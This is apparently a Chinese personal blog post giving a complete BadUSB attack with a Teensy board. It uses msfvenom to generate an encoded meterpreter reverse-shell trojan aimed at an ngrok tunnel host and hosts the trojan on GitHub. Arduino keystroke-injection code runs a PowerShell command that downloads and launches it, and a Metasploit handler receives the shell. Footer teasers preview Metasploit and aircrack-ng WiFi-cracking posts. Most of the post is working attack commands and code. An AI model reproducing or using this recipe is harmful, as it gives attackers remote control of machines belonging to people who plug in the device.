DA1SY

偏有宸机

愿勇猛精进,志愿无倦。


渗透利器-Teensy(低配版BadUSB)

准备工作

1

1.下载好arduino后直接解压

⚡ /home/da1sy/arduino-1.8.7# ./arduino

2.安装Teensy插件

⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64

注意将插件安装到arduino的解压目录下

3.arduino修改配置

打开软件后将 工具 下配置修改如下 2

4.利用ngrok实现内网穿透

在https://www.ngrok.cc/ 注册账号后开通tcp隧道

3

下载客户端

⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号

4

5.利用msfvenom生成windows端木马

 ⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe  

lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)

最后将生成的木马放到github项目上实现远程下载

6.编辑arduino代码

char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
//将连接的地址改为自己github的地址
void setup() { 
    delay(5000);
    omg(command1);
    delay(15000);
    omg(command2);
 }
  
void loop() {}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  Keyboard.println(SomeCommand);
}

编辑好后点验证,然后插入Teensy板子,最后按一下板子上的按钮完成上传

7.metasploit开启监听

⚡ /home/da1sy/# msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1   
msf exploit(multi/handler) > set lport 6666        //ngrok开通隧道时填写的本地地址与端口号
msf exploit(multi/handler) > exploit

5

8.最后对目标插入badusb

效果图如下 6

监听端 7

最后反弹的会话好像是出现了毛病,不过总体上嘛 问题不大

一些其他的代码

有时间再补
返回顶部
最近的文章

Metasploit 超级详解

一.名词解释exploit测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。payload我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令的程序。shellcode是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提...…

Metasploit继续阅读
更早的文章

Aircrack-ng 破解WIFI密码

支持监听模式的无线网卡我这里使用的是rt3070一般8187和3070的网卡都可以开启监听模式。1.网卡开启监听模式 ⚡/home/da1sy # airmon-ng start wlan1开启监听模式后网卡名子后坠都会更改为mon2.搜索广播中的WIFI ⚡/home/da1sy # airodump-ng -a wlan1mon3.对指定的网络进行抓包 ⚡/home/da1sy/wifi # airodump-ng -w add –bssid 34:96:72:9B:73:7F ...…

kali继续阅读